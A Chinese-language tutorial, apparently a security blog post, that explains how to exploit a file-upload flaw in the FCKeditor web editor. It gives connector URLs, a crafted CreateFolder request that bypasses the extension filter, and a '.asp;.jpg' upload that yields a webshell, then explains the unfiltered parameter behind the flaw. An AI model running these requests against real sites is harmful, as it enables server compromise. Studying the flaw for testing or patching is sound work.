多应用+插件架构,代码干净,二开方便,首家独创一键云编译技术,文档视频完善,免费商用码云13.8K 广告
## FCKeditor编辑器: --- > 🚗可以去这下载编辑器:http://download.csdn.net/detail/u011781521/9767326 ### 该编辑器基础 1. 查看编辑器版本 路径:FCKeditor/\_whatsnew.html 2. FCKeditor编辑器页 路径:FCKeditor/\_samples/default.html 3. 常用上传地址 ```url FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp ``` 由于这里用的是2.5的版本所以下面这条语句能用 > http://192.168.60.102:99/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp 如果在输入以上地址测试的过程中弹出提示‘’‘this connector is disabled,please check the xxx file ’, 那就是没有开启文件上传功能,需要开启 ``` # 文件路径 \editor\filemanager\connectors\asp\config.asp #参数 Dim ConfigIsEnabled ConfigIsEnabled = False ``` ### FCKeditor漏洞利用方法→文件上传漏洞 先来到前文所指的后台页面 #### 漏洞利用 1. 新建文件夹captain.asp 被系统改为captain_asp,这就是fckeditor过滤"."为"\_"的一个机制, 2. 想要突破的话采用绝对路径的方式创建文件夹,直接绕过函数。 执行以下地址就能成功创建文件夹 ``` /editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/fendo7777.asp&NewFolderName=xx.asp ``` 3. 然后我们再上传`7.asp;.jpg`到`fendo7777.asp`文件下看是否成功解析 4. 上传成功后,访问该文件,默认文件路径如下,已经成功获取webshell `http://x.x.x.x/userfiles/image/fendo7777.asp;.jpg` #### 漏洞原因 为什么手动不能创建,而通过以上地址就能成功创建了,对比下手动创建和通过以上地址创建的一个区别。 ``` #漏洞地址: /editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/fendo7777.asp&NewFolderName=x.asp #手工新建: /editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/&NewFolderName=captain.asp ``` **原因:** CurrentFolder:当前文件夹 未进行过滤(这个文件夹下的没有过滤) NewFolderName:新建文件名 进行了过滤